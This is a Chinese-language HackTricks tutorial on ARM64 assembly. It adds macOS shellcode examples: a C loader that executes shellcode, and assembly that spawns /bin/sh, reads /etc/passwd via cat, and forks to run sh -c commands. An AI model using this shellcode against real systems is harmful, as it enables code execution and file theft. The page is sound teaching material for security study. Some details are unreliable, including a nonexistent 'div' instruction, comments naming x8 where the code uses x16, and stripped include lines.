18 KiB
ARM64简介
☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家网络安全公司工作吗?想要在HackTricks中看到你的公司广告吗?或者你想要获取PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获取官方PEASS和HackTricks周边产品
- 加入💬 Discord群组 或 Telegram群组 或 关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享你的黑客技巧。
ARM64简介
ARM64,也被称为ARMv8-A,是一种64位处理器架构,用于各种设备,包括智能手机、平板电脑、服务器,甚至一些高端个人电脑(macOS)。它是ARM Holdings公司的产品,该公司以其节能的处理器设计而闻名。
寄存器
ARM64有31个通用寄存器,标记为x0
到x30
。每个寄存器可以存储一个64位(8字节)的值。对于只需要32位值的操作,可以使用相同的寄存器以32位模式访问,使用名称w0到w30。
x0
到x7
- 通常用作临时寄存器和传递子程序参数。
- **
x0
**还携带函数的返回数据
x8
- 在Linux内核中,x8
用作svc
指令的系统调用号。在macOS中,使用x16!x9
到x15
- 更多的临时寄存器,通常用于局部变量。x16
和x17
- 临时寄存器,也用于间接函数调用和PLT(Procedure Linkage Table)存根。
x16
用作svc
指令的系统调用号。
x18
- 平台寄存器。在某些平台上,该寄存器保留用于特定平台的用途。x19
到x28
- 这些是被调用者保存的寄存器。函数必须保留这些寄存器的值供其调用者使用。x29
- 帧指针。x30
- 链接寄存器。当执行BL
(带链接的分支)或BLR
(带链接到寄存器的分支)指令时,它保存返回地址。sp
- 堆栈指针,用于跟踪堆栈的顶部。pc
- 程序计数器,指向将要执行的下一条指令。
调用约定
ARM64调用约定规定,函数的前八个参数通过寄存器**x0
到x7
传递。额外的参数通过堆栈传递。返回值通过寄存器x0
传回,如果是128位则也可以通过x1
传回。x19
到x30
和sp
寄存器必须在函数调用之间保留**。
在汇编中阅读函数时,要查找函数的序言和尾声。序言通常涉及保存帧指针(x29
),设置新的帧指针和分配堆栈空间。尾声通常涉及恢复保存的帧指针和从函数返回。
常见指令
ARM64指令通常具有**opcode dst, src1, src2
的格式,其中opcode
是要执行的操作**(如add
、sub
、mov
等),dst
是结果将被存储的目标寄存器,src1
和src2
是源寄存器。也可以使用立即值代替源寄存器。
mov
:将一个值从一个寄存器移动到另一个寄存器。- 示例:
mov x0, x1
- 这将将x1
中的值移动到x0
中。 ldr
:将一个值从内存加载到寄存器中。- 示例:
ldr x0, [x1]
- 这将从由x1
指向的内存位置加载一个值到x0
中。 str
:将一个值从寄存器存储到内存中。- 示例:
str x0, [x1]
- 这将将x0
中的值存储到由x1
指向的内存位置中。 ldp
:加载一对寄存器。该指令从连续的内存位置加载两个寄存器。内存地址通常是通过将另一个寄存器中的值与偏移量相加得到的。- 示例:
ldp x0, x1, [x2]
- 这将从x2
和x2 + 8
处的内存位置分别加载x0
和x1
。 stp
:存储一对寄存器。该指令将两个寄存器存储到连续的内存位置。内存地址通常是通过将另一个寄存器中的值与偏移量相加得到的。- 示例:
stp x0, x1, [x2]
- 这将x0
和x1
存储到x2
和x2 + 8
处的内存位置。 add
:将两个寄存器的值相加,并将结果存储在一个寄存器中。- 示例:
add x0, x1, x2
- 这将将x1
和x2
中的值相加,并将结果存储在x0
中。 sub
:将两个寄存器的值相减,并将结果存储在一个寄存器中。- 示例:
sub x0, x1, x2
- 这将从x1
中减去x2
的值,并将结果存储在x0
中。 mul
: 乘法,将两个寄存器的值相乘,并将结果存储在一个寄存器中。- 示例:
mul x0, x1, x2
— 将x1
和x2
的值相乘,并将结果存储在x0
中。 div
: 除法,将一个寄存器的值除以另一个寄存器的值,并将结果存储在一个寄存器中。- 示例:
div x0, x1, x2
— 将x1
的值除以x2
的值,并将结果存储在x0
中。 bl
: 带链接分支,用于调用一个子程序。将返回地址存储在x30
中。- 示例:
bl myFunction
— 调用函数myFunction
,并将返回地址存储在x30
中。 blr
: 带链接分支到寄存器,用于调用一个子程序,其中目标在一个寄存器中指定。将返回地址存储在x30
中。- 示例:
blr x1
— 调用地址包含在x1
中的函数,并将返回地址存储在x30
中。 ret
: 从子程序返回,通常使用**x30
中的地址**。- 示例:
ret
— 使用x30
中的返回地址从当前子程序返回。 cmp
: 比较两个寄存器的值,并设置条件标志。- 示例:
cmp x0, x1
— 比较x0
和x1
的值,并相应地设置条件标志。 b.eq
: 等于时分支,基于前面的cmp
指令。- 示例:
b.eq label
— 如果前面的cmp
指令发现两个相等的值,则跳转到label
。 b.ne
: 不等于时分支。该指令检查条件标志(由前一个比较指令设置),如果比较的值不相等,则跳转到一个标签或地址。- 示例:在
cmp x0, x1
指令之后,b.ne label
— 如果x0
和x1
的值不相等,则跳转到label
。 cbz
: 比较并在零时分支。该指令将一个寄存器与零进行比较,如果它们相等,则跳转到一个标签或地址。- 示例:
cbz x0, label
— 如果x0
中的值为零,则跳转到label
。 cbnz
: 比较并在非零时分支。该指令将一个寄存器与零进行比较,如果它们不相等,则跳转到一个标签或地址。- 示例:
cbnz x0, label
— 如果x0
中的值非零,则跳转到label
。 adrp
: 计算一个符号的页地址并将其存储在一个寄存器中。- 示例:
adrp x0, symbol
— 计算symbol
的页地址并将其存储在x0
中。 ldrsw
: 从内存中加载一个有符号的32位值,并将其符号扩展为64位。- 示例:
ldrsw x0, [x1]
— 从由x1
指向的内存位置加载一个有符号的32位值,将其符号扩展为64位,并将其存储在x0
中。 stur
: 将一个寄存器的值存储到内存位置,使用另一个寄存器的偏移量。- 示例:
stur x0, [x1, #4]
— 将x0
中的值存储到当前x1
地址加4字节的内存位置。 svc
:进行系统调用。它代表"Supervisor Call"。当处理器执行此指令时,它会从用户模式切换到内核模式,并跳转到内存中内核系统调用处理代码所在的特定位置。- 示例:
mov x8, 93 ; 将退出系统调用的系统调用号(93)加载到寄存器x8中。
mov x0, 0 ; 将退出状态码(0)加载到寄存器x0中。
svc 0 ; 进行系统调用。
macOS
syscalls
Shellcodes
编译方法:
{% code overflow="wrap" %}
as -o shell.o shell.s
ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib
{% endcode %}
提取字节的方法:
# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/extract.sh
for c in $(objdump -d "s.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do
echo -n '\\x'$c
done
用于测试shellcode的C代码
```c // code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c // gcc loader.c -o loader #include #include <sys/mman.h> #include #includeint (*sc)();
char shellcode[] = "";
int main(int argc, char **argv) { printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode));
void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0);
if (ptr == MAP_FAILED) { perror("mmap"); exit(-1); } printf("[+] SUCCESS: mmap\n"); printf(" |-> Return = %p\n", ptr);
void *dst = memcpy(ptr, shellcode, sizeof(shellcode)); printf("[+] SUCCESS: memcpy\n"); printf(" |-> Return = %p\n", dst);
int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ);
if (status == -1) { perror("mprotect"); exit(-1); } printf("[+] SUCCESS: mprotect\n"); printf(" |-> Return = %d\n", status);
printf("[>] Trying to execute shellcode...\n");
sc = ptr; sc();
return 0; }
</details>
#### Shell
从[**这里**](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/shell.s)获取并解释。
{% tabs %}
{% tab title="使用adr" %}
```armasm
.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).
_main:
adr x0, sh_path ; This is the address of "/bin/sh".
mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve.
mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve.
mov x16, #59 ; Move the execve syscall number (59) into x16.
svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.
sh_path: .asciz "/bin/sh"
{% tab title="使用堆栈" %}
.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).
_main:
; We are going to build the string "/bin/sh" and place it on the stack.
mov x1, #0x622F ; Move the lower half of "/bi" into x1. 0x62 = 'b', 0x2F = '/'.
movk x1, #0x6E69, lsl #16 ; Move the next half of "/bin" into x1, shifted left by 16. 0x6E = 'n', 0x69 = 'i'.
movk x1, #0x732F, lsl #32 ; Move the first half of "/sh" into x1, shifted left by 32. 0x73 = 's', 0x2F = '/'.
movk x1, #0x68, lsl #48 ; Move the last part of "/sh" into x1, shifted left by 48. 0x68 = 'h'.
str x1, [sp, #-8] ; Store the value of x1 (the "/bin/sh" string) at the location `sp - 8`.
; Prepare arguments for the execve syscall.
mov x1, #8 ; Set x1 to 8.
sub x0, sp, x1 ; Subtract x1 (8) from the stack pointer (sp) and store the result in x0. This is the address of "/bin/sh" string on the stack.
mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve.
mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve.
; Make the syscall.
mov x16, #59 ; Move the execve syscall number (59) into x16.
svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.
{% endtab %} {% endtabs %}
使用cat命令读取文件
目标是执行execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)
,因此第二个参数(x1)是一个参数数组(在内存中表示为地址的堆栈)。
.section __TEXT,__text ; Begin a new section of type __TEXT and name __text
.global _main ; Declare a global symbol _main
.align 2 ; Align the beginning of the following code to a 4-byte boundary
_main:
; Prepare the arguments for the execve syscall
sub sp, sp, #48 ; Allocate space on the stack
mov x1, sp ; x1 will hold the address of the argument array
adr x0, cat_path
str x0, [x1] ; Store the address of "/bin/cat" as the first argument
adr x0, passwd_path ; Get the address of "/etc/passwd"
str x0, [x1, #8] ; Store the address of "/etc/passwd" as the second argument
str xzr, [x1, #16] ; Store NULL as the third argument (end of arguments)
adr x0, cat_path
mov x2, xzr ; Clear x2 to hold NULL (no environment variables)
mov x16, #59 ; Load the syscall number for execve (59) into x8
svc 0 ; Make the syscall
cat_path: .asciz "/bin/cat"
.align 2
passwd_path: .asciz "/etc/passwd"
使用fork从sh调用命令,以便主进程不被终止
To invoke a command with sh
from a forked process, you can follow these steps:
- Import the necessary libraries:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
- Create a forked process using the
fork()
function:
pid_t pid = fork();
- Check if the process is the child process:
if (pid == 0) {
// Child process
// Execute the command using sh
execl("/bin/sh", "sh", "-c", "your_command", (char *)NULL);
exit(0);
}
- Wait for the child process to finish executing the command:
else {
// Parent process
wait(NULL);
}
By using this method, the main process will not be terminated when executing the command with sh
from the forked process.
.section __TEXT,__text ; Begin a new section of type __TEXT and name __text
.global _main ; Declare a global symbol _main
.align 2 ; Align the beginning of the following code to a 4-byte boundary
_main:
; Prepare the arguments for the fork syscall
mov x16, #2 ; Load the syscall number for fork (2) into x8
svc 0 ; Make the syscall
cmp x1, #0 ; In macOS, if x1 == 0, it's parent process, https://opensource.apple.com/source/xnu/xnu-7195.81.3/libsyscall/custom/__fork.s.auto.html
beq _loop ; If not child process, loop
; Prepare the arguments for the execve syscall
sub sp, sp, #64 ; Allocate space on the stack
mov x1, sp ; x1 will hold the address of the argument array
adr x0, sh_path
str x0, [x1] ; Store the address of "/bin/sh" as the first argument
adr x0, sh_c_option ; Get the address of "-c"
str x0, [x1, #8] ; Store the address of "-c" as the second argument
adr x0, touch_command ; Get the address of "touch /tmp/lalala"
str x0, [x1, #16] ; Store the address of "touch /tmp/lalala" as the third argument
str xzr, [x1, #24] ; Store NULL as the fourth argument (end of arguments)
adr x0, sh_path
mov x2, xzr ; Clear x2 to hold NULL (no environment variables)
mov x16, #59 ; Load the syscall number for execve (59) into x8
svc 0 ; Make the syscall
_exit:
mov x16, #1 ; Load the syscall number for exit (1) into x8
mov x0, #0 ; Set exit status code to 0
svc 0 ; Make the syscall
_loop: b _loop
sh_path: .asciz "/bin/sh"
.align 2
sh_c_option: .asciz "-c"
.align 2
touch_command: .asciz "touch /tmp/lalala"
☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家 网络安全公司 工作吗?想要在 HackTricks 中 宣传你的公司 吗?或者你想要获得 PEASS 的最新版本或下载 HackTricks 的 PDF 吗?请查看 订阅计划!
- 发现我们的独家 NFTs 集合 The PEASS Family
- 获得 官方 PEASS & HackTricks 商品
- 加入 💬 Discord 群组 或者 Telegram 群组,或者在 Twitter 上 关注 我 🐦@carlospolopm。
- 通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享你的黑客技巧。